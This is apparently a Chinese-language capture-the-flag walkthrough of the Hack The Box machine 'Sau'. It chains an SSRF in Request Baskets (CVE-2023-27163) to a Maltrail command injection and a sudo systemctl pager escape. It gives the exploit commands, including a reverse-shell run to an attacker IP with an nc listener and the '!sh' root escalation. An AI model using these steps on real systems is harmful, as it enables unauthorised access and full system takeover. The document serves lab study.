htb-Sau(study)#
靶機 ip:10.10.11.224
關於 Sau
“Sau” 是一台難度為簡單的 Linux 機器,其上運行的 “Request Baskets” 實例存在通過 CVE-2023-27163 漏洞可被利用的伺服器端請求偽造(SSRF)問題。利用該漏洞,我們可以訪問一台存在未授權操作系統命令注入漏洞的 “Maltrail” 實例,從而以 “puma” 用戶身份在該機器上獲取反向 Shell。隨後,通過利用 “sudo” 的錯誤配置,我們能夠獲取 “root” Shell。
task1 目標機器開放的最大 tcp 端口是什麼?
55555
nmap -sT 10.10.11.224
task2 端口 55555 上的應用程序是由哪種開源軟體支持的?
nmap -p55555 -sV 10.10.11.224
訪問 55555 應用程序
request-baskets
task3 Sau 上運行的 request-baskets 的版本是什麼?
由 task2 任務的截圖可以知道,request-baskets 當前的版本是 1.2.1
task4 request-baskets中有個 ssrf 漏洞,cve 編號是多少?
google 搜索應用名稱加版本號就可以找到
CVE-2023-27163
task5 運行在 80 端口的應用程序是由什麼軟體支持的?
這裡需要通過 ssrf 漏洞訪問內網的 80 端口,nmap 掃描其端口是無法訪問的。
參考:https://sploitus.com/exploit?id=6BAA524E-16EA-562C-804B-113B8244C6EA,通過這個腳本可以將流量代理到 80 端口
wget https://raw.githubusercontent.com/Rubioo02/CVE-2023-27163/main/CVE-2023-27163.sh
chmod +x CVE-2023-27163.sh
./CVE-2023-27163.sh -t <TARGET_URL> -a <ATTACKER_URL>
訪問給定的鏈接:http://10.10.11.224:55555/vxctgy,如下圖,可以看到是 **Maltrail** 應用
task6 在 MailTrail v0.53 中存在一個未經身份驗證的命令注入漏洞。找到其利用的路徑。
Powered by Maltrail (v0.53)
嘗試目錄遍歷
嘗試提交,發現是 /login,查看 poc 也可以發現:https://github.com/josephberger/Maltrail-v0.53-RCE/blob/main/exploit.py
task7 在 Sau 上,Mailtrack 應用程序以什麼系統用戶身份運行?
利用 https://github.com/josephberger/Maltrail-v0.53-RCE/blob/main/exploit.py 腳本進行 rce
python3 exploit.py 10.10.14.10 1234 http://10.10.11.224:55555/vxctgy
nc 監聽:
也就是 puma 用戶
提交 user 的 flag
task9 在 Sau 上,puma 用戶以 root 身份運行的二進制文件的完整路徑是什麼(不含參數)?
/usr/bin/systemctl
task10 Sau 上安裝的 systemd 實例的完整版本字符串是什麼?
systemd 245 (245.4-4ubuntu3.22)
task11 這個版本的 systemd 有個 cve 漏洞可以提權,cve 編號是多少?
CVE-2023-26604
參考:https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7
提交 root 的 flag
sudo /usr/bin/systemctl status trail.service
!sh
